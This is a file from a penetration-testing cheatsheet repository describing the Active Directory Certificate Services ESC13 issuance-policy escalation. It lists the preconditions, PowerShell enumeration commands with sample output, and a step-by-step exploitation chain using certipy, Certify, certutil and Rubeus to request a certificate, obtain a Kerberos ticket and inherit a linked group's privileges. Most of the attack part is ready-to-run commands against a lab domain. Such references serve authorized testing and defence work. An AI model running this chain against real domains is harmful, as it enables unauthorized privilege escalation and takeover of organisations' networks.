daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-adcs-esc13.md (3432B)


      1 ---
      2 title: "Active Directory - Certificate ESC13"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-adcs-esc13.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc13.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Active Directory - Certificate ESC13
     12 
     13 ## ESC13 - Issuance Policy
     14 
     15 > If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link.
     16 
     17 **Requirements**
     18 
     19 * The principal has enrollment rights on a certificate template
     20 * The certificate template has an issuance policy extension
     21 * The issuance policy has an OID group link to a group
     22 * The certificate template defines EKUs that enable client authentication
     23 
     24 ```ps1
     25 PS C:\> $ESC13Template = Get-ADObject "CN=ESC13Template,$TemplateContainer" -Properties nTSecurityDescriptor $ESC13Template.nTSecurityDescriptor.Access | ? {$_.IdentityReference -eq "DUMPSTER\ESC13User"}
     26 AccessControlType     : Allow
     27 
     28 # check if there is an issuance policy in the msPKI-Certificate-Policy
     29 PS C:\> Get-ADObject "CN=ESC13Template,$TemplateContainer" -Properties msPKI-Certificate-Policy
     30 msPKI-Certificate-Policy : {1.3.6.1.4.1.311.21.8.4571196.1884641.3293620.10686285.12068043.134.3651508.12319448}
     31 
     32 # check for OID group link
     33 PS C:\> Get-ADObject "CN=12319448.2C2B96A74878E00434BEDD82A61861C5,$OIDContainer" -Properties DisplayName,msPKI-Cert-Template-OID,msDS-OIDToGroupLink
     34 msDS-OIDToGroupLink     : CN=ESC13Group,OU=Groups,OU=Tier0,DC=dumpster,DC=fire
     35 
     36 # verify if ESC13Group is a Universal group
     37 PS C:\> Get-ADGroup ESC13Group -Properties Members
     38 GroupScope        : Universal
     39 Members           : {}
     40 ```
     41 
     42 **Exploitation**:
     43 
     44 * Find a vulnerable template
     45 
     46   ```ps1
     47   certipy find -target dc.lab.local -dc-ip 10.10.10.10 -u "username" -p "P@ssw0rd" -stdout -vulnerable
     48   ```
     49 
     50 * Request a certificate for the vulnerable template
     51 
     52   ```ps1
     53   .\Certify.exe request /ca:DC01\dumpster-DC01-CA /template:ESC13Template
     54   certipy req -target dc.lab.local -dc-ip 10.10.10.10 -u "username" -p "P@ssw0rd" -template <ESC13-Template> -ca <CA-NAME>
     55   ```
     56 
     57 * Merge into a PFX file
     58 
     59   ```ps1
     60   certutil -MergePFX .\esc13.pem .\esc13.pfx
     61   ```
     62 
     63 * Verify the presence of the "Client Authentication" and the "Policy Identifier"
     64 
     65   ```ps1
     66   certutil -Dump -v .\esc13.pfx
     67   ```
     68 
     69 * Pass-The-Certificate: Ask a TGT for our user, but we are also member of the linked group and inherited their privileges
     70 
     71   ```ps1
     72   Rubeus.exe asktgt /user:ESC13User /certificate:C:\esc13.pfx /nowrap
     73   Rubeus.exe asktgt /user:username /certificate:username.pfx /domain:lab.local /dc:dc /nowrap
     74   ```
     75 
     76 * Pass-The-Ticket: Use the ticket that grant privileges from the AD group
     77 
     78   ```ps1
     79   Rubeus.exe ptt /ticket:<ticket>
     80   ```
     81 
     82 ## References
     83 
     84 * [ADCS ESC13 Abuse Technique - Jonas Bülow Knudsen - 02/15/2024](https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53)
     85 * [Exploitation de l’AD CS : ESC12, ESC13 et ESC14 - Guillon Bony Rémi - February, 2025](https://connect.ed-diamond.com/misc/mischs-031/exploitation-de-l-ad-cs-esc12-esc13-et-esc14)
     86 * [GOAD - part 14 - ADCS 5/7/9/10/11/13/14/15 - Mayfly - March 10, 2025](https://mayfly277.github.io/posts/ADCS-part14/)